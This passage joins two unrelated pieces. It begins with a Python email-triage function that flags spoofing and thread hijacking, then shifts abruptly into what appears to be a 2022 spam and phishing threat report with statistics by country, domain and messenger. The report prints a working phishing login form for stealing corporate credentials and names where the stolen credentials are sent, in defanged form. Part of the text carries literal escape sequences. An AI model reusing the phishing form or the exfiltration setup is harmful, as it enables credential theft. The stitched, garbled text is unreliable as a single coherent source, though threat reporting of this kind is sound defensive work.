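    """Domain part of the first address in a header, lower-cased; '' if absent."""
    return parseaddr(str(header_value or ""))[1].rpartition("@")[2].lower()


def triage(raw: str, known_participants: FrozenSet[str] = frozenset()) -> List[str]:
    """Return findings for one message. known_participants are the addresses already seen
    in the thread that In-Reply-To/References point to (empty if the thread is unknown)."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []

    from_dom, reply_dom = _domain(msg["From"]), _domain(msg["Reply-To"])
    display = parseaddr(str(msg["From"] or ""))[0]
    if from_dom in FREE_MAIL and display:
        findings.append(f"company-style display name on free-mail domain {from_dom}")
    if reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")

    # Display name vs. signature: the last non-empty lines of the plain-text body.
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body is not None else ""
    sig = [line.strip().lower() for line in text.strip().splitlines()[-3:] if line.strip()]
    if display and sig and not any(display.split()[0].lower() in line for line in sig):
        findings.append(f"display name '{display}' does not appear in the signature block")

    # Reply-chain hijacking: a reply into a known thread from a stranger.
    sender = parseaddr(str(msg["From"] or ""))[1].lower()
    if msg["In-Reply-To"] and known_participants and sender not in known_participants:
        findings.append(f"reply into an existing thread from unknown participant {sender}")

    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith(RISKY_EXT):
            findings.append(f"risky attachment type: {name}")
    return findings
```

None of these findings is conclusive on its own (small firms do write from Gmail), which is why the function returns all of them rather than a verdict; the first-contact message above trips three, while a reply from a known thread participant with no attachment trips none. The participant check needs a store of Message-IDs and senders per thread, which a mail gateway already keeps.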
After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39.png>)

**_A fake Dropbox page_**

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg>)

**_Login page with a phishing form_**

When victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail. Note that the form below has no `action` attribute: the submission is handled by the externally hosted, obfuscated script referenced at the end of the snippet, so the exfiltration endpoint does not appear in the form markup itself.

    <form name="loginform">
    <div class="form-group">
    <label for="">Email Address</label>
    <input type="email" id="email" class="form-control" name="email" placeholder="email Address">
    <div class="email-error"></div>
    </div>
    <div class="form-group">
    <label for="">Password</label>
    <input type="password" id="password" class="form-control" name="password" placeholder="Password">
    <div class="password-error"></div>
    </div>
    <div class="form-group btn-area">
    <button class="download-btn" id="db" type="submit">Download</button>
    </div>
    </form>
    </div>
    <script src="https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b"></script>

**_HTML representation of a phishing form_**

### Victims

We identified targets of this campaign around the world, in the following countries among others: Russia, Bosnia and Herzegovina, Singapore, USA, Germany, Egypt, Thailand, Turkey, Serbia, Netherlands, Jordan, Iran, Kazakhstan, Portugal, and Malaysia.

## Statistics: spam

### Share of spam in mail traffic

In 2022, an average of 48.63% of emails worldwide were spam, 3.07 p.p. more than in 2021.
Over the course of the year, however, the share of spam in global email traffic gradually declined, from 51.02% in the first quarter to 46.16% in the fourth.

_Share of spam in global email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161102/02-en-spam-report-2022-diagrams.png>))_

The most active month in terms of spam was February 2022, with junk traffic accounting for 52.78% of all email correspondence. June was in second place (51.66%). December was the calmest: only 45.20% of emails in that month were spam.

In the Runet, the proportion of spam in email traffic is generally higher than worldwide. In 2022, an average of 52.44% of emails were junk mailings. At the same time, the same gradual shift in favor of legitimate correspondence can be seen there. We saw the largest share of spam in the Runet in the first quarter, at 54.72% of all emails, and by the fourth quarter it had dropped to 49.20%.

_Proportion of spam in Runet email traffic, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161132/03-en-spam-report-2022-diagrams.png>))_

Even though the second quarter (53.96%) was quieter in terms of spam than the first, the most active month in the Russian segment of the internet was June (60.16%). Most likely, the share of spam in June, both in Russia and globally, was influenced by the surge in mailings with offers from Chinese factories that we observed that month. The quietest month in the Runet was December (47.18%), the same as globally.

### Countries and territories: sources of spam

In 2022, the share of spam originating from Russia continued to grow, from 24.77% to 29.82%. Mainland China (14.00%), whose share increased by 5.27 percentage points, moved into second place, swapping places with Germany (5.19%).
Third place is still held by the United States (10.71%).\n\n_TOP 20 countries and territories \u2014 sources of spam, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161204/04-en-spam-report-2022-diagrams.png>))_\n\nThe Netherlands remained in fifth place (3.70%), its share decreased compared to 2021. Sixth and seventh places went to Japan (3.25%) and Brazil (3.18%), whose shares rose by 0.89 and 3.77 p.p., respectively. Next come the UK (2.44%), France (2.27%) and India (1.82%).\n\n### Malicious mail attachments\n\nIn 2022, our Mail Anti-Virus detected 166,187,118 malicious email attachments. That's an increase of 18 million from the previous year. This component caused most triggers in March, May, and June 2022.\n\n_Number of Mail Anti-Virus hits, January \u2014 December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161240/05-en-spam-report-2022-diagrams.png>))_\n\nThe most common malicious email attachments in 2022, as in 2021, were [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojan stealers (7.14%), whose share decreased slightly. [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (4.89%) moved up to second place, and [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (4.61%) spreading as archived electronic documents moved down to third place. The fourth most common malware were vulnerability exploits [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (4.33%) in Microsoft Equation Editor. In 2022, attackers used them significantly more often than [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) exploits in the same component (1.80%). 
This vulnerability was more widespread in 2021 and has now dropped to tenth place.\n\n_TOP 10 malware families spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161308/06-en-spam-report-2022-diagrams.png>))_\n\n[ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) Trojans (3.27%), sent in the form of disk images, moved up to number five, and the sixth most common was the [Guloader](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Guloader/>) downloader family (2.65%), which delivers remotely controlled malware to victims' devices. They are closely followed by the [Badur](<https://threats.kaspersky.com/en/threat/Trojan.PDF.Badur/>) family (2.60%), PDF files containing links to web resources with questionable content, and in eighth place is the infamous [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>) botnet (2.52%). Law enforcement shut this down in early 2021, but by fall, attackers had restored the infrastructure and were actively distributing it in 2022. More recently, Emotet has been used to deliver other malware to victims' devices, particularly ransomware. The ninth most popular family was [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (2.10%), which creates malicious tasks in the task scheduler.\n\n_TOP 10 types of malware spread by email attachments in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161339/07-en-spam-report-2022-diagrams.png>))_\n\nThe list of the most common malware sent via email usually corresponds to the list of families. As in 2021, attackers mostly distributed the same instances from the TOP 10 families.\n\n### Countries and territories targeted by malicious mailings\n\nSpain remains the leader in terms of blocked malicious attachments in 2022 (8.78%), which is a slight decrease compared to 2021 (9.32%). 
The share of Russia (7.29%), on the other hand, increased slightly. Third place went to Mexico (6.73%), and fourth place to Brazil (4.81%), whose share was virtually unchanged from the previous reporting period.

_TOP 20 countries and territories targeted by malicious mailings, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161409/08-en-spam-report-2022-diagrams.png>))_

In Italy, 4.76% of all detected malicious attachments were blocked in 2022. The country is followed by Vietnam (4.43%) and Turkey (4.31%). The percentage of Mail Anti-Virus detections on computers of users from Germany (3.85%) continued to decrease. The share of the United Arab Emirates (3.41%) also decreased slightly, dropping to ninth place, while Malaysia (2.98%) remained in tenth place.

## Statistics: phishing

In 2022, the number of phishing attacks increased markedly. Our Anti-Phishing system prevented 507,851,735 attempts to follow a phishing link, roughly double the number in 2021.

### Map of phishing attacks

In 2022, the geography of phishing attacks changed dramatically. Attempts to click phishing links were most often blocked on devices from Vietnam (17.03%); in 2021, this country was not among the TOP 10 most attacked countries and territories. Macau is in second place (13.88%), also absent from last year's ranking. Madagascar is in third place (12.04%), up from seventh in 2021. In addition to Vietnam and Macau, Algeria (11.05%), Malawi (10.91%) and Morocco (10.43%) appeared at the top of the list of most attacked countries and territories. Ecuador (11.05%) moved up to fifth place, while Brunei (10.59%) dropped one place to seventh. Brazil (10.57%) and Portugal (10.33%) moved from first and third places to eighth and tenth, respectively, and France, which was second in 2021, left the TOP 10.

TOP 10 countries and territories by share of attacked users:

**Country/territory** | **Share of attacked users***
---|---
Vietnam | 17.03%
Macau | 13.88%
Madagascar | 12.04%
Algeria | 11.05%
Ecuador | 11.05%
Malawi | 10.91%
Brunei | 10.59%
Brazil | 10.57%
Morocco | 10.43%
Portugal | 10.33%

**_* Share of users encountering phishing out of the total number of Kaspersky users in that country/territory, 2022_**

### Top-level domains

As in previous years, the majority of phishing pages were hosted in the COM domain zone, but its share almost halved, from 31.55% to 17.69%. The XYZ zone remained in second place (8.79%), although its share also decreased. The third most popular domain among attackers was FUN (7.85%), which had not previously received their attention. The zone is associated with entertainment content, which is perhaps what attracted fraudsters to it.

_Most frequent top-level domains for phishing pages in 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161441/09-en-spam-report-2022-diagrams.png>))_

Domains ORG (3.89%) and TOP (1.80%) swapped places relative to 2021 but remained in fourth and fifth places. The top ten domain zones in most demand among cybercriminals also included RU (1.52%), COM.BR (1.13%), DE (0.98%), CO.UK (0.98%) and SE (0.92%).

### Organizations under phishing attacks

_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._

In 2022, pages impersonating delivery services had the highest percentage of clicks on phishing links blocked by our solutions (27.38%). Online stores (15.56%), which were popular with attackers during the pandemic, occupied second place. Payment systems (10.39%) and banks (10.39%) ranked third and fourth, respectively.

_Distribution of organizations targeted by phishers, by category, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161508/10-en-spam-report-2022-diagrams.png>))_

The share of global internet portals (8.97%) almost halved, with almost as many phishing resources targeting users of smaller web services (8.24%). Social networks (6.83%), online games (2.84%), messengers (2.02%) and financial services (1.94%) complete the TOP 10 categories of sites of interest to criminals.

### Hijacking Telegram accounts

In 2022, our solutions stopped 378,496 phishing links aimed at hijacking Telegram accounts. Apart from a spike in phishing activity throughout June, when the number of blocked links exceeded 37,000, the first three quarters were relatively quiet. However, by the end of the year the number of phishing attacks on the messenger's users increased dramatically, to 44,700 in October, 83,100 in November and 125,000 in December.
This increase is most likely due to several large-scale Telegram account hijacking campaigns that we [observed in late 2022](<https://www.kaspersky.ru/blog/telegram-takeover-contest/34472/>) (article in Russian).

_Number of clicks on phishing links aimed at hijacking a Telegram account worldwide, and in Russia specifically, January — December 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161540/11-en-spam-report-2022-diagrams.png>))_

It is of note that the majority of these phishing attacks were aimed at users from Russia. While in the first months of 2022 their share was approximately half of the total number of attacks worldwide, since March 70–90% of all attempts to follow phishing links by Telegram users were made by Russian users.

### Phishing in messengers

_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._

In 2022, our mobile solution blocked 360,185 attempts to click on phishing links from messengers. Of these, 82.71% came from WhatsApp, 14.12% from Telegram and another 3.17% from Viber.

_Distribution of links blocked by the Safe Messaging component, by messenger, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161612/12-en-spam-report-2022-diagrams.png>))_

Phishing activity on WhatsApp is down slightly since 2021. On average, the Safe Messaging component blocked 816 clicks on fraudulent links per day. The first half of the year was the most turbulent, and by the third quarter phishing activity in the messenger had dropped sharply.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154605/spam-phishing-report-2022-42.png>)

**_Dynamics of phishing activity on WhatsApp in 2022 (weekly number of detected links shown)_**

The largest number of phishing attempts on WhatsApp, approximately 76,000, was recorded in Brazil. Russia is in second place: over the year, the Safe Messaging component prevented 69,000 attempts to go to fraudulent resources from the messenger.

_TOP 7 countries and territories where users most often clicked phishing links in WhatsApp ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161647/13-en-spam-report-2022-diagrams.png>))_

Unlike WhatsApp, the number of phishing attacks on Telegram almost tripled in 2022 compared to the previous reporting period. On average, our solutions blocked 140 attempts to follow phishing links in this messenger per day. The peak of activity came at the end of June and beginning of July, when the number of blocked clicks exceeded 1,500 per week. Phishing activity on Telegram also increased sharply at the end of the year.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154645/spam-phishing-report-2022-41.png>)

**_Dynamics of phishing activity on Telegram in 2022 (weekly number of detected links shown)_**

In Russia, we recorded the largest number (21,000) of attempts to click a link to fraudulent resources from Telegram. Second place went to Brazil, where 3,800 clicks were blocked.

_TOP 7 countries and territories where users most frequently clicked phishing links from Telegram ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161717/14-en-spam-report-2022-diagrams.png>))_

## Conclusion

Times of crisis create the preconditions for crime to flourish, including online. Scams promising compensation and payouts from government agencies, large corporations and banks are likely to remain popular among cybercriminals next year. The unpredictability of the currency market and the departure of individual companies from specific countries' markets will likely affect the number of scams associated with online shopping. At the same time, the COVID-19 topic, popular with cybercriminals in 2020 and 2021 but already beginning to wane in 2022, will finally cease to be relevant and will be replaced by more pressing global issues.

Recently, we have seen an increase in targeted phishing attacks in which scammers do not move on to the phishing attempt itself immediately, but only after several introductory emails in which they actively correspond with the victim. This trend is likely to continue. New tricks are also likely to emerge in the corporate sector in 2023, with attacks generating significant profits for attackers.